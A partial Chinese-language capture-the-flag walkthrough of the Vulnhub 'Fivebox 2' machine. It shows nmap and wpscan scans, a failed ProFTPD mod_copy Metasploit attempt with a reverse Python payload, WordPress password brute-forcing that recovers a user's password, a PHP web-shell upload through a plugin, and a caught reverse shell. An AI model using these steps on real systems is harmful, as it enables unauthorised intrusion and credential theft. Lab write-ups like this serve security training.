Vulnhub之Fivebox 2靶机测试过程(部分)
Fivebox 2
识别目标主机IP地址
(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:e2:ee:06 1 60 PCS Systemtechnik GmbH
192.168.56.199 08:00:27:45:de:88 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.199
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.199 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-22 20:48 EST
Nmap scan report for bogon (192.168.56.199)
Host is up (0.00062s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp ProFTPD 1.3.5e
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Five86-2 – Just another WordPress site
|_http-generator: WordPress 5.1.4
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:45:DE:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 163.74 seconds
NMAP扫描结果表明目标主机有2个开放端口:21(FTP)、80(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ ftp 192.168.56.199
Connected to 192.168.56.199.
anonymous
220 ProFTPD 1.3.5e Server (Debian) [::ffff:172.18.0.10]
Name (192.168.56.199:kali): 331 Password required for anonymous
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ searchsploit ProFTPd 1.3.5e
Exploits: No Results
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ searchsploit ProFTPd 1.3.5
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
-
不允许匿名访问
-
可能存在远程命令执行漏洞
看下是否可以用metasploit相关模块?
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options Module options (exploit/unix/ftp/proftpd_modcopy_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using- Metasploit RPORT 80 yes HTTP port (TCP) RPORT_FTP 21 yes FTP port SITEPATH /var/www yes Absolute writable website path SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base path to the website TMPPATH /tmp yes Absolute writable path VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 ProFTPD 1.3.5 View the full module info with the info, or info -d command. msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.56.199 RHOSTS => 192.168.56.199 msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run [-] 192.168.56.199:80 - Exploit failed: A payload has not been selected. [*] Exploit completed, but no session was created. msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/ set payload cmd/unix/bind_awk set payload cmd/unix/generic set payload cmd/unix/reverse_perl_ssl set payload cmd/unix/bind_perl set payload cmd/unix/reverse_awk set payload cmd/unix/reverse_python set payload cmd/unix/bind_perl_ipv6 set payload cmd/unix/reverse_perl set payload cmd/unix/reverse_python_ssl msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_python payload => cmd/unix/reverse_python msf6 exploit(unix/ftp/proftpd_modcopy_exec) > show options Module options (exploit/unix/ftp/proftpd_modcopy_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.56.199 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using- Metasploit RPORT 80 yes HTTP port (TCP) RPORT_FTP 21 yes FTP port SITEPATH /var/www yes Absolute writable website path SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Base path to the website TMPPATH /tmp yes Absolute writable path VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_python): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port SHELL /bin/sh yes The system shell to use Exploit target: Id Name -- ---- 0 ProFTPD 1.3.5 View the full module info with the info, or info -d command. msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LhOST 192.168.56.146 LhOST => 192.168.56.146 msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LPORT 5555 LPORT => 5555 msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run [*] Started reverse TCP handler on 192.168.56.146:5555 [*] 192.168.56.199:80 - 192.168.56.199:21 - Connected to FTP server [*] 192.168.56.199:80 - 192.168.56.199:21 - Sending copy commands to FTP server [-] 192.168.56.199:80 - Exploit aborted due to failure: unknown: 192.168.56.199:21 - Failure copying from /proc/self/cmdline [*] Exploit completed, but no session was created. msf6 exploit(unix/ftp/proftpd_modcopy_exec) >
浏览器访问80端口,返回页面内容不完整,查看页面源代码可知主机名为
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo vim /etc/hosts
[sudo] password for kali:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.199 five86-2
刷新页面,目标站点为wordpress站点,
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:37:01 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.199/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.199/, Match: 'WordPress 5.1.4'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] barney
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] peter
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] gillian
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] stephen
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 22 21:37:08 2023
[+] Requests Done: 56
[+] Cached Requests: 4
[+] Data Sent: 13.914 KB
[+] Data Received: 147.598 KB
[+] Memory used: 209.285 MB
[+] Elapsed time: 00:00:06
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 -U barney -P /usr/share/wordlists/rockyou.txt
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:37:44 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.199/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.199/, Match: 'WordPress 5.1.4'
[i] The main theme could not be detected.
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===============================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - barney / spooky1
Trying barney / slideshows Time: 00:03:18 < > (11615 / 14356007) 0.08% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: barney, Password: spooky1
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 22 21:41:16 2023
[+] Requests Done: 11757
[+] Cached Requests: 28
[+] Data Sent: 5.951 MB
[+] Data Received: 6.859 MB
[+] Memory used: 266.188 MB
[+] Elapsed time: 00:03:31
登录wordpress后台,不过发现barney并不是管理员,看一下能不能破解出admin的密码
但是运行wpscan 15分钟左右仍没有结果,暂时放弃。
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ wpscan --url http://192.168.56.199 --plugins-detection mixed -e p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.199/ [192.168.56.199]
[+] Started: Wed Feb 22 21:59:11 2023
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.199/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.199/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://192.168.56.199/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.199/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.1.4 identified (Insecure, released on 2019-12-12).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.199/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.4'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.199/, Match: 'WordPress 5.1.4'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:03 <============================================> (1500 / 1500) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.199/wp-content/plugins/akismet/
| Last Updated: 2022-12-01T17:18:00.000Z
| Readme: http://192.168.56.199/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.0.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/akismet/, status: 200
|
| Version: 4.1.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/akismet/readme.txt
[+] user-role-editor
| Location: http://192.168.56.199/wp-content/plugins/user-role-editor/
| Last Updated: 2022-12-16T06:14:00.000Z
| Readme: http://192.168.56.199/wp-content/plugins/user-role-editor/readme.txt
| [!] The version is out of date, the latest version is 4.63.2
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/user-role-editor/, status: 200
|
| Version: 4.52.2 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/user-role-editor/readme.txt
| Confirmed By: Change Log (Aggressive Detection)
| - http://192.168.56.199/wp-content/plugins/user-role-editor/changelog.txt, Match: '4.52.2'
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Feb 22 21:59:20 2023
[+] Requests Done: 1535
[+] Cached Requests: 8
[+] Data Sent: 419.228 KB
[+] Data Received: 348.217 KB
[+] Memory used: 230.359 MB
[+] Elapsed time: 00:00:09
没有扫描出可利用的漏洞
登录barney可以知道wordpress有IEAC插件,可利用该插件上传shell.php,根据要求,可以将shell.php以及任意一个html文件压缩,然后创建post,在post中选择e-learning,然后上传shell1.php,成功上传后,位置在:
/wp-content/uploads/articulate_uploads/shell1/shell.php
在KaliLinux 上成功得到了反弹回来的shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Fivebox_2]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.199] 47942
Linux five86-2 5.3.0-26-generic #28-Ubuntu SMP Wed Dec 18 05:37:46 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:25:10 up 1:42, 0 users, load average: 0.08, 0.18, 1.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@five86-2:/$ cd /home
cd /home
www-data@five86-2:/home$ ls -alh
ls -alh
提权
上传linpeas.sh脚本至目标主机,执行该脚本:
Files with capabilities (limited to 50):
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip
STRIVE FOR PROGRESS,NOT FOR PERFECTION
